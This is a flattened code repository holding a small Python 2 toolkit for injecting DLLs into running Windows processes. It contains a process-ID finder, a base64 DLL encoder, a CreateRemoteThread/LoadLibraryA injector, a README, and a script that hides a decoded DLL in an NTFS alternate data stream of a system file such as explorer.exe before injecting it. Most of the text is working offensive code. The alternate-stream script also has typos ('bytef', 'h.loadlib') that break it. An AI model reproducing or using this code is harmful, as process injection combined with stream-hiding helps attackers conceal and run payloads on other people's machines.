├── get_pid.py ├── dll_encoder.py ├── dll_inject.py ├── README.md └── ads_encoded_dll_inject.py /get_pid.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Get PID script 3 | from win32com.client import GetObject 4 | import sys 5 | WMI = GetObject('winmgmts:') 6 | 7 | print "Tool for finding the PID of a process" 8 | print "Insecurety Research (2013)" 9 | 10 | if len(sys.argv) != 2: 11 | print "Usage: %s processname" %(sys.argv[0]) 12 | print "Eg: %s explorer.exe" %(sys.argv[0]) 13 | sys.exit(0) 14 | 15 | proc = sys.argv[1] 16 | 17 | p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(proc)) 18 | pid = p[0].Properties_('ProcessId').Value #derp, forgot the value 19 | print "Process ID of %s is %s" %(proc, pid) 20 | -------------------------------------------------------------------------------- /dll_encoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # DLL Encoder - Insecurety Research 3 | # Encodes a DLL as a text file for text_inject.py 4 | # Just does a base64, nothing super exciting... 5 | import sys 6 | 7 | print "DLL to Text Encoder - Insecurety Research (2013)" 8 | print "Encodes a DLL as a base64 encoded textfile" 9 | 10 | if (len(sys.argv) != 3): 11 | print "Usage: %s " %(sys.argv[0]) 12 | print "Eg: %s C:\\test\messagebox.dll encoded.txt" %(sys.argv[0]) 13 | sys.exit(0) 14 | 15 | dll = sys.argv[1] 16 | out = sys.argv[2] 17 | 18 | try: 19 | print "[+] Reading DLL..." 20 | f = open(dll, "r") 21 | raw = f.read() 22 | f.close() 23 | except Exception: 24 | print "[-] Something failed... Quitting!" 25 | sys.exit(0) 26 | try: 27 | print "[+] Creating encoded outfile..." 28 | encoded = raw.encode('base64') 29 | g = open(out, "w") 30 | g.write(encoded) 31 | g.close() 32 | except Exception: 33 | print "[-] Something failed... Quitting!" 34 | sys.exit(0) 35 | print "[+] Encoded File Saved As: %s" %(out) 36 | -------------------------------------------------------------------------------- /dll_inject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Win32 DLL injector from Grey Hat Python 3 | # Minor formatting cleanups done... 4 | import sys 5 | from ctypes import * 6 | 7 | print "DLL Injector implementation in Python" 8 | print "Taken from Grey Hat Python" 9 | 10 | if (len(sys.argv) != 3): 11 | print "Usage: %s " %(sys.argv[0]) 12 | print "Eg: %s 1111 C:\\test\messagebox.dll" %(sys.argv[0]) 13 | sys.exit(0) 14 | 15 | PAGE_READWRITE = 0x04 16 | PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF ) 17 | VIRTUAL_MEM = ( 0x1000 | 0x2000 ) 18 | 19 | kernel32 = windll.kernel32 20 | pid = sys.argv[1] 21 | dll_path = sys.argv[2] 22 | 23 | dll_len = len(dll_path) 24 | 25 | # Get handle to process being injected... 26 | h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) 27 | 28 | if not h_process: 29 | print "[!] Couldn't get handle to PID: %s" %(pid) 30 | print "[!] Are you sure %s is a valid PID?" %(pid) 31 | sys.exit(0) 32 | 33 | # Allocate space for DLL path 34 | arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE) 35 | 36 | # Write DLL path to allocated space 37 | written = c_int(0) 38 | kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written)) 39 | 40 | # Resolve LoadLibraryA Address 41 | h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") 42 | h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA") 43 | 44 | # Now we createRemoteThread with entrypoiny set to LoadLibraryA and pointer to DLL path as param 45 | thread_id = c_ulong(0) 46 | 47 | if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)): 48 | print "[!] Failed to inject DLL, exit..." 49 | sys.exit(0) 50 | 51 | print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value) 52 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | python-dll-injection 2 | ==================== 3 | 4 | Python toolkit for injecting DLL files into running processes on Windows 5 | 6 | This toolkit is ever expanding as I bother hacking up extra parts for it. 7 | It was inspired after reading Grey Hat Python as a little bit of bedtime reading 8 | to familiarize myself with using Python on Windows for interacting with processes, etc. 9 | 10 | Anyway, here is a breakdown of the components and their usage: 11 | 12 | dll_inject.py - Simple enough Python DLL injector. Give it a DLL and a PID to inject into, and it will inject the DLL into the process using the createRemoteThread API. 13 | 14 | $ python dll_inject.py 15 | 16 | DLL Injector implementation in Python 17 | 18 | Taken from Grey Hat Python 19 | 20 | Usage: dll_inject.py 21 | 22 | Eg: dll_inject.py 1111 C:\test\messagebox.dll 23 | 24 | 25 | 26 | 27 | dll_encoder.py - Rather simple tool, takes in a DLL file and outputs it as a base64 encoded text file for use with other tools. 28 | 29 | $ python dll_encoder.py 30 | 31 | DLL to Text Encoder - Insecurety Research (2013) 32 | 33 | Encodes a DLL as a base64 encoded textfile 34 | 35 | Usage: dll_encoder.py 36 | 37 | Eg: dll_encoder.py C:\test\messagebox.dll encoded.txt 38 | 39 | 40 | 41 | ads_encoded_dll_inject.py - my piece de resistance :) it takes in the encoded DLL file, decodes it, stores the decoded DLL file in ADS, and then injects it into the process of your choice. 42 | 43 | $ python ads_encoded_dll_inject.py 44 | 45 | Encoded DLL Injector 46 | 47 | uses ADS streams for extra 1337'ness 48 | 49 | version 0.1. 50 | 51 | Usage: ads_encoded_dll_inject.py 52 | 53 | Eg: ads_encoded_dll_inject.py 1111 C:\test\encoded.txt C:\Windows\explorer.exe 54 | 55 | 56 | This project is for informational use only and so I can mess with Windows a little. Will clean up and rewrite the original code borrowed from Grey Hat Python eventually. 57 | -------------------------------------------------------------------------------- /ads_encoded_dll_inject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Encoded DLL injector 3 | # Injects encoded DLL's into a process 4 | import sys 5 | from ctypes import * 6 | 7 | print "Encoded DLL Injector" 8 | print "uses ADS streams for extra 1337'ness" 9 | print "version 0.1." 10 | 11 | if (len(sys.argv) != 4): 12 | print "Usage: %s " %(sys.argv[0]) 13 | print "Eg: %s 1111 C:\\test\encoded.txt C:\Windows\explorer.exe" %(sys.argv[0]) 14 | sys.exit(0) 15 | 16 | pid = sys.argv[1] 17 | encoded = sys.argv[2] 18 | victim = sys.argv[3] 19 | dropname = "exe.dll" 20 | 21 | PAGE_READWRITE = 0x04 22 | PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF ) 23 | VIRTUAL_MEM = ( 0x1000 | 0x2000 ) 24 | 25 | kernel32 = windll.kernel32 26 | 27 | try: 28 | print "[+] Decoding the file..." 29 | f = open(encoded, "r") 30 | dllenc = f.read() 31 | f.close() 32 | dll = dllenc.decode('base64') 33 | except Exception: 34 | print "[-] Something failed!" 35 | sys.exit(0) 36 | try: 37 | print "[+] Injecting to alternate data streams!" 38 | hax = "%s:%s" %(victim, dropname) 39 | adsw = open(hax, "wb") 40 | adsw.write(dll) 41 | adsw.close() 42 | except Exception: 43 | print "[-] Something has gone terribly wrong!" 44 | sys.exit(0) 45 | 46 | dll_path = hax 47 | dll_len = len(dll_path) 48 | 49 | # Get handle to process being injected... 50 | h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) 51 | 52 | if not h_process: 53 | print "[!] Couldn't get handle to PID: %s" %(pid) 54 | print "[!] Are you sure %s is a valid PID?" %(pid) 55 | sys.exit(0) 56 | 57 | # Allocate space for DLL path 58 | arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE) 59 | 60 | # Write DLL path to allocated space 61 | written = c_int(0) 62 | kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, bytef(written)) 63 | 64 | # Resolve LoadLibraryA Address 65 | h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") 66 | h.loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA") 67 | 68 | # Now we createRemoteThread with entrypoiny set to LoadLibraryA and pointer to DLL path as param 69 | thread_id = c_ulong(0) 70 | 71 | if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)): 72 | print "[!] Failed to inject DLL, exit..." 73 | sys.exit(0) 74 | 75 | print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value) 76 | --------------------------------------------------------------------------------